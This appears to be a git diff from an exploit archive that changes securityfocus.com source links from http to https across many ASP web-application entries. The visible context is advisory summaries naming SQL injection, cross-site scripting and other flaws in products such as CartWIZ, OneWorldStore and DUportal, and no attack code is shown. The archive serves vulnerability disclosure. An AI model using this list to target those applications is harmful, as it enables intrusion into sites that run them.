@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12362/info +source: https://www.securityfocus.com/bid/12362/info Comersus Cart is reportedly affected by multiple vulnerabilities. There is a possiblity of gaining administrator access due to a failure of the application to remove an installation script after install. There is the possiblity of SQL injection by passing a malicious HTTP referer header. There are also some possible cross-site scripting issues. diff --git a/exploits/asp/webapps/25078.txt b/exploits/asp/webapps/25078.txt index dd69f1bf3..c264611ff 100644 --- a/exploits/asp/webapps/25078.txt +++ b/exploits/asp/webapps/25078.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12420/info +source: https://www.securityfocus.com/bid/12420/info Reportedly Eurofull E-Commerce is affected by a cross-site scripting vulnerability in the 'mensresp.asp' script. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25084.txt b/exploits/asp/webapps/25084.txt index e23e986bb..b6a036ecb 100644 --- a/exploits/asp/webapps/25084.txt +++ b/exploits/asp/webapps/25084.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12459/info +source: https://www.securityfocus.com/bid/12459/info A remote URI-redirection vulnerability affects Microsoft Outlook Web Access. This issue occurs because the application fails to properly sanitize URI-supplied data. diff --git a/exploits/asp/webapps/25110.txt b/exploits/asp/webapps/25110.txt index f3a828ddf..080e939b4 100644 --- a/exploits/asp/webapps/25110.txt +++ b/exploits/asp/webapps/25110.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12574/info +source: https://www.securityfocus.com/bid/12574/info It is reported that ASP.NET is prone to various cross-site scripting attacks. These issues when ASP.NET converts Unicode characters ranging from U+ff00-U+ff60 to ASCII. 
diff --git a/exploits/asp/webapps/25148.txt b/exploits/asp/webapps/25148.txt index 80356522e..8992c52b8 100644 --- a/exploits/asp/webapps/25148.txt +++ b/exploits/asp/webapps/25148.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12626/info +source: https://www.securityfocus.com/bid/12626/info It is reported that Mono is prone to various cross-site scripting attacks. These issues result from insufficient sanitization of user-supplied data and arise when Mono converts Unicode characters ranging from U+ff00-U+ff60 to ASCII. diff --git a/exploits/asp/webapps/25233.txt b/exploits/asp/webapps/25233.txt index bb7cf0310..0980a9a10 100644 --- a/exploits/asp/webapps/25233.txt +++ b/exploits/asp/webapps/25233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12836/info +source: https://www.securityfocus.com/bid/12836/info ACS Blog is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25252.txt b/exploits/asp/webapps/25252.txt index ca049e439..0fa23ff68 100644 --- a/exploits/asp/webapps/25252.txt +++ b/exploits/asp/webapps/25252.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12861/info +source: https://www.securityfocus.com/bid/12861/info betaparticle blog is reported prone to multiple vulnerabilities. The following individual issues are reported: diff --git a/exploits/asp/webapps/25253.txt b/exploits/asp/webapps/25253.txt index c453a00c6..18bc3dbef 100644 --- a/exploits/asp/webapps/25253.txt +++ b/exploits/asp/webapps/25253.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12861/info +source: https://www.securityfocus.com/bid/12861/info betaparticle blog is reported prone to multiple vulnerabilities. The following individual issues are reported: diff --git a/exploits/asp/webapps/25254.txt b/exploits/asp/webapps/25254.txt index f72f6bc60..9a494a47f 100644 --- a/exploits/asp/webapps/25254.txt 
+++ b/exploits/asp/webapps/25254.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12861/info +source: https://www.securityfocus.com/bid/12861/info betaparticle blog is reported prone to multiple vulnerabilities. The following individual issues are reported: diff --git a/exploits/asp/webapps/25313.txt b/exploits/asp/webapps/25313.txt index fed6f5e64..9d59a3fa6 100644 --- a/exploits/asp/webapps/25313.txt +++ b/exploits/asp/webapps/25313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12921/info +source: https://www.securityfocus.com/bid/12921/info ACS Blog is affected by an HTML injection vulnerability. diff --git a/exploits/asp/webapps/25318.txt b/exploits/asp/webapps/25318.txt index 59cc8d1bb..c2217bbe3 100644 --- a/exploits/asp/webapps/25318.txt +++ b/exploits/asp/webapps/25318.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12936/info +source: https://www.securityfocus.com/bid/12936/info Multiple input-validation vulnerabilities reportedly affect PortalApp. These issues occur due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/asp/webapps/25324.txt b/exploits/asp/webapps/25324.txt index c496c9482..9be411085 100644 --- a/exploits/asp/webapps/25324.txt +++ b/exploits/asp/webapps/25324.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12958/info +source: https://www.securityfocus.com/bid/12958/info XM Forum is reported prone to a script injection vulnerability. diff --git a/exploits/asp/webapps/25332.txt b/exploits/asp/webapps/25332.txt index 3f40b3288..8676437e9 100644 --- a/exploits/asp/webapps/25332.txt +++ b/exploits/asp/webapps/25332.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12985/info +source: https://www.securityfocus.com/bid/12985/info SiteEnable is reported prone to an SQL injection vulnerability. 
diff --git a/exploits/asp/webapps/25346.txt b/exploits/asp/webapps/25346.txt index 3084cd1e9..db6424c14 100644 --- a/exploits/asp/webapps/25346.txt +++ b/exploits/asp/webapps/25346.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13032/info +source: https://www.securityfocus.com/bid/13032/info Active Auction House is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25347.txt b/exploits/asp/webapps/25347.txt index 82a0813a2..bcb058a15 100644 --- a/exploits/asp/webapps/25347.txt +++ b/exploits/asp/webapps/25347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13034/info +source: https://www.securityfocus.com/bid/13034/info Active Auction House is reportedly affected by a SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in a SQL query. diff --git a/exploits/asp/webapps/25348.txt b/exploits/asp/webapps/25348.txt index a98536cc0..273019a09 100644 --- a/exploits/asp/webapps/25348.txt +++ b/exploits/asp/webapps/25348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13036/info +source: https://www.securityfocus.com/bid/13036/info Active Auction House is reportedly affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25349.txt b/exploits/asp/webapps/25349.txt index e41070d6b..f67ee8d7d 100644 --- a/exploits/asp/webapps/25349.txt +++ b/exploits/asp/webapps/25349.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13036/info +source: https://www.securityfocus.com/bid/13036/info Active Auction House is reportedly affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25351.txt b/exploits/asp/webapps/25351.txt index aacceec7b..b1af60b39 100644 --- a/exploits/asp/webapps/25351.txt +++ b/exploits/asp/webapps/25351.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13038/info +source: https://www.securityfocus.com/bid/13038/info Active Auction House is reportedly affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25352.txt b/exploits/asp/webapps/25352.txt index d0b7ee19b..79d6765a0 100644 --- a/exploits/asp/webapps/25352.txt +++ b/exploits/asp/webapps/25352.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13039/info +source: https://www.securityfocus.com/bid/13039/info Active Auction House is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25390.txt b/exploits/asp/webapps/25390.txt index 72ac935e4..1d7b35840 100644 --- a/exploits/asp/webapps/25390.txt +++ b/exploits/asp/webapps/25390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13125/info +source: https://www.securityfocus.com/bid/13125/info Comersus Cart is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly validate user-supplied input. diff --git a/exploits/asp/webapps/25424.txt b/exploits/asp/webapps/25424.txt index cc59c9b4f..4e464ecd0 100644 --- a/exploits/asp/webapps/25424.txt +++ b/exploits/asp/webapps/25424.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13181/info +source: https://www.securityfocus.com/bid/13181/info OneWorldStore is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25425.txt b/exploits/asp/webapps/25425.txt index c3ef7fe43..096fdc1a7 100644 --- a/exploits/asp/webapps/25425.txt +++ b/exploits/asp/webapps/25425.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13182/info +source: https://www.securityfocus.com/bid/13182/info OneWorldStore is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25426.txt b/exploits/asp/webapps/25426.txt index e83db4364..82abc0c5b 100644 --- a/exploits/asp/webapps/25426.txt +++ b/exploits/asp/webapps/25426.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13183/info +source: https://www.securityfocus.com/bid/13183/info OneWorldStore is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25427.txt b/exploits/asp/webapps/25427.txt index e6d10e69a..931405077 100644 --- a/exploits/asp/webapps/25427.txt +++ b/exploits/asp/webapps/25427.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13184/info +source: https://www.securityfocus.com/bid/13184/info OneWorldStore is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25428.txt b/exploits/asp/webapps/25428.txt index 087f7f1e8..53ced7ac5 100644 --- a/exploits/asp/webapps/25428.txt +++ b/exploits/asp/webapps/25428.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13185/info +source: https://www.securityfocus.com/bid/13185/info OneWorldStore is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25455.txt b/exploits/asp/webapps/25455.txt index 6a6f60bc0..d04d4c80b 100644 --- a/exploits/asp/webapps/25455.txt +++ b/exploits/asp/webapps/25455.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13249/info +source: https://www.securityfocus.com/bid/13249/info OneWorldStore is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25456.txt b/exploits/asp/webapps/25456.txt index 0ed1628ec..65a7bca4c 100644 --- a/exploits/asp/webapps/25456.txt +++ b/exploits/asp/webapps/25456.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13251/info +source: https://www.securityfocus.com/bid/13251/info OneWorldStore is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25466.txt b/exploits/asp/webapps/25466.txt index 1cc0d3840..867e92567 100644 --- a/exploits/asp/webapps/25466.txt +++ b/exploits/asp/webapps/25466.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13274/info +source: https://www.securityfocus.com/bid/13274/info EcommProV3 is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25476.txt b/exploits/asp/webapps/25476.txt index 54858c2e0..f9eb3cdae 100644 --- a/exploits/asp/webapps/25476.txt +++ b/exploits/asp/webapps/25476.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13285/info +source: https://www.securityfocus.com/bid/13285/info DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25477.txt b/exploits/asp/webapps/25477.txt index 9e14fa450..005d6d95b 100644 --- a/exploits/asp/webapps/25477.txt +++ b/exploits/asp/webapps/25477.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13285/info +source: https://www.securityfocus.com/bid/13285/info DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25478.txt b/exploits/asp/webapps/25478.txt index bb21927de..a7109839b 100644 --- a/exploits/asp/webapps/25478.txt +++ b/exploits/asp/webapps/25478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13285/info +source: https://www.securityfocus.com/bid/13285/info DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25479.txt b/exploits/asp/webapps/25479.txt index 11f4f07ad..0669be602 100644 --- a/exploits/asp/webapps/25479.txt +++ b/exploits/asp/webapps/25479.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13285/info +source: https://www.securityfocus.com/bid/13285/info DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25480.txt b/exploits/asp/webapps/25480.txt index 4b95bbde9..4a3cd506e 100644 --- a/exploits/asp/webapps/25480.txt +++ b/exploits/asp/webapps/25480.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13285/info +source: https://www.securityfocus.com/bid/13285/info DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25481.txt b/exploits/asp/webapps/25481.txt index ec0146ca4..fabf5b316 100644 --- a/exploits/asp/webapps/25481.txt +++ b/exploits/asp/webapps/25481.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13285/info +source: https://www.securityfocus.com/bid/13285/info DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25482.txt b/exploits/asp/webapps/25482.txt index 60cdc8daf..4836290b3 100644 --- a/exploits/asp/webapps/25482.txt +++ b/exploits/asp/webapps/25482.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13288/info +source: https://www.securityfocus.com/bid/13288/info DUportal/DUportal SQL are prone to multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25483.txt b/exploits/asp/webapps/25483.txt index 413c9de5b..a11b65a5f 100644 --- a/exploits/asp/webapps/25483.txt +++ b/exploits/asp/webapps/25483.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13288/info +source: https://www.securityfocus.com/bid/13288/info DUportal/DUportal SQL are prone to multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25484.txt b/exploits/asp/webapps/25484.txt index 5d00142fd..99e9cfde4 100644 --- a/exploits/asp/webapps/25484.txt +++ b/exploits/asp/webapps/25484.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13288/info +source: https://www.securityfocus.com/bid/13288/info DUportal/DUportal SQL are prone to multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25485.txt b/exploits/asp/webapps/25485.txt index be37ad508..ff25b1c71 100644 --- a/exploits/asp/webapps/25485.txt +++ b/exploits/asp/webapps/25485.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13288/info +source: https://www.securityfocus.com/bid/13288/info DUportal/DUportal SQL are prone to multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25498.txt b/exploits/asp/webapps/25498.txt index 35d0d5c27..a64439eb7 100644 --- a/exploits/asp/webapps/25498.txt +++ b/exploits/asp/webapps/25498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13315/info +source: https://www.securityfocus.com/bid/13315/info ASPNuke is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25500.txt b/exploits/asp/webapps/25500.txt index 19da74161..58119b1e2 100644 --- a/exploits/asp/webapps/25500.txt +++ b/exploits/asp/webapps/25500.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13317/info +source: https://www.securityfocus.com/bid/13317/info ASPNuke is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25501.txt b/exploits/asp/webapps/25501.txt index 80d9425c7..8d541b073 100644 --- a/exploits/asp/webapps/25501.txt +++ b/exploits/asp/webapps/25501.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13319/info +source: https://www.securityfocus.com/bid/13319/info ASPNuke is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25502.txt b/exploits/asp/webapps/25502.txt index 0b88142c0..d4fb62dfe 100644 --- a/exploits/asp/webapps/25502.txt +++ b/exploits/asp/webapps/25502.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13320/info +source: https://www.securityfocus.com/bid/13320/info ASPNuke is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25504.txt b/exploits/asp/webapps/25504.txt index b0889f6b4..b8514632b 100644 --- a/exploits/asp/webapps/25504.txt +++ b/exploits/asp/webapps/25504.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13327/info +source: https://www.securityfocus.com/bid/13327/info Black Knight Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. diff --git a/exploits/asp/webapps/25505.txt b/exploits/asp/webapps/25505.txt index 4740a0b6a..e66058c95 100644 --- a/exploits/asp/webapps/25505.txt +++ b/exploits/asp/webapps/25505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13328/info +source: https://www.securityfocus.com/bid/13328/info Black Knight Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. diff --git a/exploits/asp/webapps/25506.txt b/exploits/asp/webapps/25506.txt index 44ed295eb..e8c42af55 100644 --- a/exploits/asp/webapps/25506.txt +++ b/exploits/asp/webapps/25506.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13330/info +source: https://www.securityfocus.com/bid/13330/info CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. diff --git a/exploits/asp/webapps/25507.txt b/exploits/asp/webapps/25507.txt index 5cdff5eb0..a10175a0e 100644 --- a/exploits/asp/webapps/25507.txt +++ b/exploits/asp/webapps/25507.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13331/info +source: https://www.securityfocus.com/bid/13331/info CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. diff --git a/exploits/asp/webapps/25508.txt b/exploits/asp/webapps/25508.txt index 4f58f8ea2..b37d2dd00 100644 --- a/exploits/asp/webapps/25508.txt +++ b/exploits/asp/webapps/25508.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13332/info +source: https://www.securityfocus.com/bid/13332/info CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. diff --git a/exploits/asp/webapps/25509.txt b/exploits/asp/webapps/25509.txt index 6f52725e0..d9f89f493 100644 --- a/exploits/asp/webapps/25509.txt +++ b/exploits/asp/webapps/25509.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13333/info +source: https://www.securityfocus.com/bid/13333/info CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. diff --git a/exploits/asp/webapps/25510.txt b/exploits/asp/webapps/25510.txt index 2f4af8343..cd14e0523 100644 --- a/exploits/asp/webapps/25510.txt +++ b/exploits/asp/webapps/25510.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13334/info +source: https://www.securityfocus.com/bid/13334/info CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. diff --git a/exploits/asp/webapps/25511.txt b/exploits/asp/webapps/25511.txt index d82fd299b..a1d299c4f 100644 --- a/exploits/asp/webapps/25511.txt +++ b/exploits/asp/webapps/25511.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13335/info +source: https://www.securityfocus.com/bid/13335/info CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. diff --git a/exploits/asp/webapps/25512.txt b/exploits/asp/webapps/25512.txt index 1f933b7ab..bfd1f391e 100644 --- a/exploits/asp/webapps/25512.txt +++ b/exploits/asp/webapps/25512.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13336/info +source: https://www.securityfocus.com/bid/13336/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25513.txt b/exploits/asp/webapps/25513.txt index e12f96015..bf5448fe0 100644 --- a/exploits/asp/webapps/25513.txt +++ b/exploits/asp/webapps/25513.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13337/info +source: https://www.securityfocus.com/bid/13337/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25514.txt b/exploits/asp/webapps/25514.txt index cdf6516f8..8c5c44279 100644 --- a/exploits/asp/webapps/25514.txt +++ b/exploits/asp/webapps/25514.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13338/info +source: https://www.securityfocus.com/bid/13338/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25515.txt b/exploits/asp/webapps/25515.txt index 4d7821eaf..df8a5b3d0 100644 --- a/exploits/asp/webapps/25515.txt +++ b/exploits/asp/webapps/25515.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13339/info +source: https://www.securityfocus.com/bid/13339/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25516.txt b/exploits/asp/webapps/25516.txt index 08e5a5ab4..e372f3c7b 100644 --- a/exploits/asp/webapps/25516.txt +++ b/exploits/asp/webapps/25516.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13340/info +source: https://www.securityfocus.com/bid/13340/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25520.txt b/exploits/asp/webapps/25520.txt index ccedca4be..75997f1e6 100644 --- a/exploits/asp/webapps/25520.txt +++ b/exploits/asp/webapps/25520.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13341/info +source: https://www.securityfocus.com/bid/13341/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25521.txt b/exploits/asp/webapps/25521.txt index ed4ded5c9..d21a5b9e1 100644 --- a/exploits/asp/webapps/25521.txt +++ b/exploits/asp/webapps/25521.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13342/info +source: https://www.securityfocus.com/bid/13342/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25522.txt b/exploits/asp/webapps/25522.txt index ccdac48cd..7baa18564 100644 --- a/exploits/asp/webapps/25522.txt +++ b/exploits/asp/webapps/25522.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13343/info +source: https://www.securityfocus.com/bid/13343/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25529.txt b/exploits/asp/webapps/25529.txt index 5e6ed44d7..630d09547 100644 --- a/exploits/asp/webapps/25529.txt +++ b/exploits/asp/webapps/25529.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13358/info +source: https://www.securityfocus.com/bid/13358/info StorePortal is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25530.txt b/exploits/asp/webapps/25530.txt index 8c5fbcc14..87d9e6a72 100644 --- a/exploits/asp/webapps/25530.txt +++ b/exploits/asp/webapps/25530.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13361/info +source: https://www.securityfocus.com/bid/13361/info OneWorldStore is prone to an information disclosure vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25536.txt b/exploits/asp/webapps/25536.txt index 352d18f5a..78dd87305 100644 --- a/exploits/asp/webapps/25536.txt +++ b/exploits/asp/webapps/25536.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13376/info +source: https://www.securityfocus.com/bid/13376/info An SQL injection vulnerability affects MetaCart e-Shop V-8. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/asp/webapps/25537.txt b/exploits/asp/webapps/25537.txt index 899426599..ec8be8724 100644 --- a/exploits/asp/webapps/25537.txt +++ b/exploits/asp/webapps/25537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13377/info +source: https://www.securityfocus.com/bid/13377/info An SQL injection vulnerability affects MetaCart e-Shop V-8. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/asp/webapps/25539.txt b/exploits/asp/webapps/25539.txt index a84cd6964..7f8ba3494 100644 --- a/exploits/asp/webapps/25539.txt +++ b/exploits/asp/webapps/25539.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13382/info +source: https://www.securityfocus.com/bid/13382/info A remote SQL-injection vulnerability affects MetaCart2 because the application fails to properly sanitize user-supplied input before including it in SQL queries. diff --git a/exploits/asp/webapps/25540.txt b/exploits/asp/webapps/25540.txt index 81f590d93..d294f77f8 100644 --- a/exploits/asp/webapps/25540.txt +++ b/exploits/asp/webapps/25540.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13383/info +source: https://www.securityfocus.com/bid/13383/info A remote SQL injection vulnerability affects MetaCart2. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/asp/webapps/25541.txt b/exploits/asp/webapps/25541.txt index 1d2a06181..bf13b12a8 100644 --- a/exploits/asp/webapps/25541.txt +++ b/exploits/asp/webapps/25541.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13384/info +source: https://www.securityfocus.com/bid/13384/info A remote SQL injection vulnerability affects MetaCart2. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/asp/webapps/25542.txt b/exploits/asp/webapps/25542.txt index b04ed60bd..8b8cdb060 100644 --- a/exploits/asp/webapps/25542.txt +++ b/exploits/asp/webapps/25542.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13385/info +source: https://www.securityfocus.com/bid/13385/info A remote SQL injection vulnerability affects MetaCart2. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/asp/webapps/25543.txt b/exploits/asp/webapps/25543.txt index b8a2aa3fd..6fd5b30c6 100644 --- a/exploits/asp/webapps/25543.txt +++ b/exploits/asp/webapps/25543.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13393/info +source: https://www.securityfocus.com/bid/13393/info MetaCart2 is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25544.txt b/exploits/asp/webapps/25544.txt index 3ae2d65f3..b0a9322fc 100644 --- a/exploits/asp/webapps/25544.txt +++ b/exploits/asp/webapps/25544.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13395/info +source: https://www.securityfocus.com/bid/13395/info A remote SQL injection vulnerability affects MetaBid Auctions. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/asp/webapps/25585.txt b/exploits/asp/webapps/25585.txt index 61dde7d79..255c857e9 100644 --- a/exploits/asp/webapps/25585.txt +++ b/exploits/asp/webapps/25585.txt 
